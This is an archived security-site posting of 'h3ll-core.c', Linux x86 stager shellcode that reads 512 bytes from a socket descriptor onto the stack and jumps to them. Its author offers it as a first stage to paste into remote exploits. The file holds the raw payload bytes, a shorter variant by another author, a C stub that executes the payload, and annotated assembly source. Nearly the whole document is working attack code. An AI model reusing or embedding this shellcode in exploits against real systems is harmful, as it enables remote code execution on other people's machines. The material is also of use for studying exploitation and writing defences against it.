
h3ll-core.c

h3ll-core.c
Posted Nov 8, 2005
Authored by Charles Stevenson | Site bokeoa.com

if(read(fd,buf,512)<=2) _exit(1) else buf(); shellcode for Linux x86. h3ll-core.s is appended.

tags | x86, shellcode
systems | linux
SHA-256 | d3520474d0b54fff6d65387a6361d6638be7d0e9f057c1a62cb7801571603558

h3ll-core.c

/* h3ll-core.c by Charles Stevenson <core@bokeoa.com> 
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it as a first stage payload when I desire to
* follow up with a real large payload of goodness. This actually
* is a bit larger than necessary because of the error checking but
* in some cases proves nice. For a tiny version of the same theme
* check out mcb's 14 byte (saving of 15 bytes for all you
* mathematicians out there ;). The only problem might be that his
* reads from stdin and can only read 385 bytes less than mine. So
* If you like to go big on the shellcode use mine... otherwise here's
* mcb's (or comment out the delimited lines below to shrink mine):
*
* "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
*
* I assume the file descriptor is in %esi. Since that's where it
* was on the last exploit I wrote. Change the instruction to
* the appropriate register from your fndsckcode or put an int in
* there for an fd that's always the same.
*/
char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
// Raw Linux/x86 machine code, one instruction per string literal; the
// annotated GAS source (h3ll-core.s) is appended at the end of this file.
// The array lives in writable data, so the jump into it from main() only
// succeeds where that segment is mapped executable; a toolchain that maps
// data non-executable faults at the indirect call instead.
// uncomment the following line to raise SIGTRAP in gdb
// "\xcc" // int3
// 22 bytes:
// if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
"\x31\xdb" // xor %ebx,%ebx        -> ebx = 0
"\xf7\xe3" // mul %ebx             -> eax = edx = 0 (0 * 0), no mov needed
"\x42" // inc %edx                 -> edx = 1
"\xc1\xe2\x09" // shl $0x9,%edx    -> edx = 1 << 9 = 512 (read count)
"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi) -> ebx = esi
"\x04\x03" // add $0x3,%al         -> eax = 3 = __NR_read (see the .s below)
"\x54" // push %esp                -> buffer is the current stack pointer
"\x59" // pop %ecx                 -> ecx = that pointer
"\xcd\x80" // int $0x80            -> read(ebx, ecx, edx)
"\x3c\x02" // cmp $0x02,%al // (optional error check)
//   NOTE(review): only the low byte of the return value is compared, so this
//   is not a faithful "count <= 2" test across the whole 0..512 range.
"\x7e\x02" // jle exit // (optional exit clean)
"\xff\xe1" // jmp *%ecx            -> transfer control to the bytes just read
// 7 bytes _exit(1) (optional _exit(1);)
"\x31\xc0" // xor %eax,%eax        -> eax = 0
"\x40" // inc %eax                 -> eax = 1 = __NR_exit
"\x89\xc3" // mov %eax,%ebx        -> exit status 1
"\xcd\x80" // int $0x80            -> _exit(1)
;

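/*
 * Test stub: prints the payload length and then jumps into hellcode[].
 *
 * Known limitations of this stub, kept as written apart from the format fix:
 *  - the file includes neither <stdio.h> nor <string.h>, so printf/strlen
 *    depend on implicit declarations; add both includes on a C99+ toolchain;
 *  - strlen() stops at the first NUL byte, so the printed length is the
 *    NUL-free prefix (this payload contains no 0x00 byte, so it is exact);
 *  - hellcode[] lives in writable data; the indirect call only succeeds
 *    where that segment is mapped executable;
 *  - the payload reads from the fd held in %esi, which is whatever main()
 *    happens to leave there; nothing in this stub sets it.
 */
int main(void)
{
    void (*shell)(void) = (void (*)(void))hellcode;
    /* %zu: strlen returns size_t; "%d" with a size_t argument is undefined. */
    printf("%zu byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
           strlen(hellcode));
    shell();
    return 0;
}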

# h3ll.s by core@bokeoa.com based on some code zen-parse helped me to
# write a few years ago.. this is especially tuned for pulltheplug fu
# challenge #3 it reads 512 bytes of shellcode onto the stack and calls
# it and i also implemented some error checking!

.globl main
main:
int3 # SIGTRAP to gdb (deliberate breakpoint; commented out in the C byte string above)
xor %ebx,%ebx # ebx = 0
mul %ebx # eax = edx = 0 (0 * 0); clears edx:eax without a mov
inc %edx # 1 << 9 == 512 bytes
shl $0x9,%edx # edx = 512 = read count
xor %esi, %ebx # fd stored in %esi (ebx = esi, since ebx was 0)
add $0x3,%al # __NR_read
push %esp # pointer to sp
pop %ecx # ecx = buffer = current stack pointer
int $0x80 # count = read(fd,buf,512)
cmpb $0x2, %al # if (count <= 2) -- only the low byte of %eax is compared
jle exit # _exit(1)
jmp *%ecx # else buf()
exit:
xor %eax,%eax # eax = 0
inc %eax # eax = 1 = __NR_exit
mov %eax,%ebx # exit status = 1
int $0x80 # _exit(1)


